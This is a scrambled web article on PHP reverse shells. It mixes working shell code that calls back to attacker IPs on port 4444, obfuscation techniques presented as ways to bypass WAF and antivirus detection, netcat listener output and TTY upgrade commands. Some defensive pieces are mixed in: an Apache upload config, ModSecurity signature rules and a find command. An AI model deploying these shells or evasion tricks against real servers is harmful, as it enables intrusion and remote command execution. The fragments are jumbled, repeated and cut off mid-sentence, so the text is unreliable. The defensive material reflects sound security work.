Reverse | Shell Php

<Directory "/var/www/html/uploads"> php_flag engine off AddType text/plain .php .phtml .php5 </Directory> Between 2014 and 2017, the Revslider plugin for WordPress had a file upload vulnerability. Attackers uploaded a file named shell-316.php containing a simple reverse shell:

<?php // Using backticks (which are identical to shell_exec) $sock = fsockopen("10.0.0.1", 4444); while ($cmd = fread($sock, 2048)) $output = `$cmd`; fwrite($sock, $output);

SecRule REQUEST_FILENAME "\.php$" "chain,deny,id:10001" SecRule REQUEST_BODY|ARGS "(fsockopen|pfsockopen|shell_exec|system|`.*`)" "t:lowercase" Never allow user uploads to be executed as PHP. In Apache .htaccess : Reverse Shell Php

python3 -c 'import pty; pty.spawn("/bin/bash")' # Then press Ctrl+Z stty raw -echo; fg export TERM=xterm Modern web firewalls (WAFs) and antivirus scanners look for known signatures like fsockopen , shell_exec , and system() . To bypass detection, you must obfuscate. Technique 1: String Concatenation & Encoding <?php $c1 = "fso"; $c2 = "ckopen"; $ip = chr(49).chr(57).chr(50).".".chr(49).chr(54).chr(56).".".chr(49).".".chr(49).chr(48); $port = 4444; $sock = $c1.$c2($ip, $port); while ($cmd = fread($sock, 2048)) $out = shell_exec($cmd); fwrite($sock, $out);

listening on [any] 4444 ... connect to [192.168.1.10] from target.com [10.0.0.5] 54321 id uid=33(www-data) gid=33(www-data) groups=33(www-data) A netcat shell is fragile. Upgrade it: To bypass detection, you must obfuscate

<?php $sock = pfsockopen("192.168.1.10", 4444); $proc = proc_open("/bin/sh -i", [0=>$sock,1=>$sock,2=>$sock], $pipes); ?> XOR two strings to produce the function name dynamically.

?> Or using mail() with a malicious sendmail parameter (CVE-2016-10033 style) is old but possible. For system administrators and blue teams, understanding the attack is essential for defense. 1. Disable Dangerous PHP Functions Edit php.ini : Upgrade it: &lt;

find /var/www/html -name "*.php" -mtime -1 -ls ModSecurity rules can catch the pattern: